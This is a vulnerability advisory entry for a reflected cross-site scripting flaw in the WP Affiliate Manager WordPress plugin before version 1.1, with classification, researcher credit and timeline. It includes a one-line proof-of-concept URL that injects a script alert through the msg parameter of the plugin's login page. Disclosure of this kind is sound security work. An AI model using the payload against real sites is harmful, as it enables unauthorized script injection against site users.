WordPress Plugin Vulnerabilities
WP Affiliate Manager < 1.1 - Reflected Cross-Site Scripting
Description
The plugin does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
Proof of Concept
https://example.com/wp-content/plugins/wp-affiliate-platform/affiliates/login.php?msg=<script>alert(/XSS/)</script>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Felipe Andrian Peixoto
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2014-08-01 (about 9 years ago)
Added
2014-08-01 (about 9 years ago)
Last Updated
2022-10-20 (about 1 years ago)